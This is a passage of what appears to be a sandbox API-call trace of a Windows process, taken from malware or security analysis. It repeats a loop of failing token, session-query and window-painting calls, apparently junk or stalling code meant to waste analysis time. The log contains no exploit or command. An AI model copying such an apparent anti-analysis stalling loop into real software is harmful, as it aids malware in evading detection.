ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.158] GetLastError () returned 0x7a [0221.158] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.158] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.159] WTSFreeMemory (pMemory=0x0) [0221.159] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.159] TextOutW (hdc=0x0, x=1224, y=2824, lpString="", c=0) returned 1 [0221.159] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.159] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.159] GetTickCount () returned 0xe38a [0221.160] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.160] SetForegroundWindow (hWnd=0x0) returned 0 [0221.160] BringWindowToTop (hWnd=0x0) returned 0 [0221.160] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x418) returned 1 [0221.160] GetTokenInformation (in: TokenHandle=0x418, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.160] GetLastError () returned 0x7a [0221.160] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.160] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.160] WTSFreeMemory (pMemory=0x0) [0221.160] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.160] TextOutW (hdc=0x0, x=1234, y=2849, lpString="", c=0) returned 1 [0221.160] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.160] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.161] GetTickCount () returned 0xe38a [0221.161] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.164] SetForegroundWindow (hWnd=0x0) returned 0 [0221.164] BringWindowToTop (hWnd=0x0) returned 0 [0221.164] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x41c) returned 1 [0221.164] GetTokenInformation (in: TokenHandle=0x41c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.164] GetLastError () returned 0x7a [0221.164] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.164] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.165] WTSFreeMemory (pMemory=0x0) [0221.165] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.165] TextOutW (hdc=0x0, x=1244, y=2874, lpString="", c=0) returned 1 [0221.165] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.165] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.165] GetTickCount () returned 0xe399 [0221.165] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.166] SetForegroundWindow (hWnd=0x0) returned 0 [0221.166] BringWindowToTop (hWnd=0x0) returned 0 [0221.166] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x420) returned 1 [0221.166] GetTokenInformation (in: TokenHandle=0x420, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.166] GetLastError () returned 0x7a [0221.166] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.166] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.166] WTSFreeMemory (pMemory=0x0) [0221.166] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.166] TextOutW (hdc=0x0, x=1254, y=2899, lpString="", c=0) returned 1 [0221.166] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.166] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.166] GetTickCount () returned 0xe399 [0221.167] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.167] SetForegroundWindow (hWnd=0x0) returned 0 [0221.167] BringWindowToTop (hWnd=0x0) returned 0 [0221.167] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x424) returned 1 [0221.167] GetTokenInformation (in: TokenHandle=0x424, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.167] GetLastError () returned 0x7a [0221.167] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.167] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.168] WTSFreeMemory (pMemory=0x0) [0221.168] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.168] TextOutW (hdc=0x0, x=1264, y=2924, lpString="", c=0) returned 1 [0221.168] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.168] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.168] GetTickCount () returned 0xe399 [0221.168] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.168] SetForegroundWindow (hWnd=0x0) returned 0 [0221.168] BringWindowToTop (hWnd=0x0) returned 0 [0221.169] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x428) returned 1 [0221.169] GetTokenInformation (in: TokenHandle=0x428, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.169] GetLastError () returned 0x7a [0221.169] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.169] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.169] WTSFreeMemory (pMemory=0x0) [0221.169] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.169] TextOutW (hdc=0x0, x=1274, y=2949, lpString="", c=0) returned 1 [0221.169] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.169] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.169] GetTickCount () returned 0xe399 [0221.170] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.170] SetForegroundWindow (hWnd=0x0) returned 0 [0221.170] BringWindowToTop (hWnd=0x0) returned 0 [0221.170] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x42c) returned 1 [0221.170] GetTokenInformation (in: TokenHandle=0x42c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.170] GetLastError () returned 0x7a [0221.170] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.170] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.171] WTSFreeMemory (pMemory=0x0) [0221.171] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.171] TextOutW (hdc=0x0, x=1284, y=2974, lpString="", c=0) returned 1 [0221.171] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.171] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.171] GetTickCount () returned 0xe399 [0221.171] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.171] SetForegroundWindow (hWnd=0x0) returned 0 [0221.171] BringWindowToTop (hWnd=0x0) returned 0 [0221.171] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x430) returned 1 [0221.171] GetTokenInformation (in: TokenHandle=0x430, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.171] GetLastError () returned 0x7a [0221.171] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.171] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.172] WTSFreeMemory (pMemory=0x0) [0221.172] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.172] TextOutW (hdc=0x0, x=1294, y=2999, lpString="", c=0) returned 1 [0221.172] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.172] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.172] GetTickCount () returned 0xe399 [0221.173] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.173] SetForegroundWindow (hWnd=0x0) returned 0 [0221.173] BringWindowToTop (hWnd=0x0) returned 0 [0221.173] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x434) returned 1 [0221.173] GetTokenInformation (in: TokenHandle=0x434, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.173] GetLastError () returned 0x7a [0221.173] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.173] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.174] WTSFreeMemory (pMemory=0x0) [0221.174] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.174] TextOutW (hdc=0x0, x=1304, y=3024, lpString="", c=0) returned 1 [0221.174] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.174] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.174] GetTickCount () returned 0xe399 [0221.174] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.174] SetForegroundWindow (hWnd=0x0) returned 0 [0221.175] BringWindowToTop (hWnd=0x0) returned 0 [0221.175] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x438) returned 1 [0221.175] GetTokenInformation (in: TokenHandle=0x438, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.175] GetLastError () returned 0x7a [0221.175] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.175] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.175] WTSFreeMemory (pMemory=0x0) [0221.175] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.175] TextOutW (hdc=0x0, x=1314, y=3049, lpString="", c=0) returned 1 [0221.175] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.175] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.175] GetTickCount () returned 0xe399 [0221.178] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.178] SetForegroundWindow (hWnd=0x0) returned 0 [0221.178] BringWindowToTop (hWnd=0x0) returned 0 [0221.178] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x43c) returned 1 [0221.178] GetTokenInformation (in: TokenHandle=0x43c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.178] GetLastError () returned 0x7a [0221.178] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.178] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.178] WTSFreeMemory (pMemory=0x0) [0221.178] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.178] TextOutW (hdc=0x0, x=1324, y=3074, lpString="", c=0) returned 1 [0221.178] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.178] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.179] GetTickCount () returned 0xe3a9 [0221.181] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.181] SetForegroundWindow (hWnd=0x0) returned 0 [0221.181] BringWindowToTop (hWnd=0x0) returned 0 [0221.181] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x440) returned 1 [0221.181] GetTokenInformation (in: TokenHandle=0x440, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.181] GetLastError () returned 0x7a [0221.181] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.181] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.181] WTSFreeMemory (pMemory=0x0) [0221.181] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.181] TextOutW (hdc=0x0, x=1334, y=3099, lpString="", c=0) returned 1 [0221.182] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.182] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.182] GetTickCount () returned 0xe3a9 [0221.182] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.182] SetForegroundWindow (hWnd=0x0) returned 0 [0221.182] BringWindowToTop (hWnd=0x0) returned 0 [0221.182] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x444) returned 1 [0221.182] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.182] GetLastError () returned 0x7a [0221.182] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.182] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.183] WTSFreeMemory (pMemory=0x0) [0221.183] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.183] TextOutW (hdc=0x0, x=1344, y=3124, lpString="", c=0) returned 1 [0221.183] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.183] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.183] GetTickCount () returned 0xe3a9 [0221.184] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.184] SetForegroundWindow (hWnd=0x0) returned 0 [0221.184] BringWindowToTop (hWnd=0x0) returned 0 [0221.184] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x448) returned 1 [0221.184] GetTokenInformation (in: TokenHandle=0x448, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.184] GetLastError () returned 0x7a [0221.184] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.184] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.185] WTSFreeMemory (pMemory=0x0) [0221.185] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.185] TextOutW (hdc=0x0, x=1354, y=3149, lpString="", c=0) returned 1 [0221.185] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.185] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.185] GetTickCount () returned 0xe3a9 [0221.185] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.185] SetForegroundWindow (hWnd=0x0) returned 0 [0221.186] BringWindowToTop (hWnd=0x0) returned 0 [0221.186] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x44c) returned 1 [0221.186] GetTokenInformation (in: TokenHandle=0x44c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.186] GetLastError () returned 0x7a [0221.186] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.186] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.186] WTSFreeMemory (pMemory=0x0) [0221.186] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.186] TextOutW (hdc=0x0, x=1364, y=3174, lpString="", c=0) returned 1 [0221.186] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.186] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.186] GetTickCount () returned 0xe3a9 [0221.187] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.188] SetForegroundWindow (hWnd=0x0) returned 0 [0221.188] BringWindowToTop (hWnd=0x0) returned 0 [0221.188] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x450) returned 1 [0221.188] GetTokenInformation (in: TokenHandle=0x450, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.188] GetLastError () returned 0x7a [0221.188] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.188] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.188] WTSFreeMemory (pMemory=0x0) [0221.188] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.189] TextOutW (hdc=0x0, x=1374, y=3199, lpString="", c=0) returned 1 [0221.189] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.189] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.189] GetTickCount () returned 0xe3a9 [0221.189] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.189] SetForegroundWindow (hWnd=0x0) returned 0 [0221.189] BringWindowToTop (hWnd=0x0) returned 0 [0221.189] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x454) returned 1 [0221.190] GetTokenInformation (in: TokenHandle=0x454, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.190] GetLastError () returned 0x7a [0221.190] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.190] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.190] WTSFreeMemory (pMemory=0x0) [0221.190] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.190] TextOutW (hdc=0x0, x=1384, y=3224, lpString="", c=0) returned 1 [0221.190] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.190] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.190] GetTickCount () returned 0xe3a9 [0221.191] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.191] SetForegroundWindow (hWnd=0x0) returned 0 [0221.191] BringWindowToTop (hWnd=0x0) returned 0 [0221.191] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x458) returned 1 [0221.191] GetTokenInformation (in: TokenHandle=0x458, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.191] GetLastError () returned 0x7a [0221.191] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.191] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.192] WTSFreeMemory (pMemory=0x0) [0221.192] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.192] TextOutW (hdc=0x0, x=1394, y=3249, lpString="", c=0) returned 1 [0221.192] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.192] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.192] GetTickCount () returned 0xe3a9 [0221.195] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.195] SetForegroundWindow (hWnd=0x0) returned 0 [0221.195] BringWindowToTop (hWnd=0x0) returned 0 [0221.196] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x45c) returned 1 [0221.196] GetTokenInformation (in: TokenHandle=0x45c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.196] GetLastError () returned 0x7a [0221.196] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.196] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.196] WTSFreeMemory (pMemory=0x0) [0221.196] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.196] TextOutW (hdc=0x0, x=1404, y=3274, lpString="", c=0) returned 1 [0221.196] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.196] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.197] GetTickCount () returned 0xe3b8 [0221.199] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.199] SetForegroundWindow (hWnd=0x0) returned 0 [0221.199] BringWindowToTop (hWnd=0x0) returned 0 [0221.199] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x460) returned 1 [0221.199] GetTokenInformation (in: TokenHandle=0x460, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.199] GetLastError () returned 0x7a [0221.199] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.199] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.200] WTSFreeMemory (pMemory=0x0) [0221.200] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.200] TextOutW (hdc=0x0, x=1414, y=3299, lpString="", c=0) returned 1 [0221.200] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.200] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.200] GetTickCount () returned 0xe3b8 [0221.200] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.200] SetForegroundWindow (hWnd=0x0) returned 0 [0221.201] BringWindowToTop (hWnd=0x0) returned 0 [0221.201] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x464) returned 1 [0221.201] GetTokenInformation (in: TokenHandle=0x464, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.201] GetLastError () returned 0x7a [0221.201] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.201] WTSQuerySessionInformationA 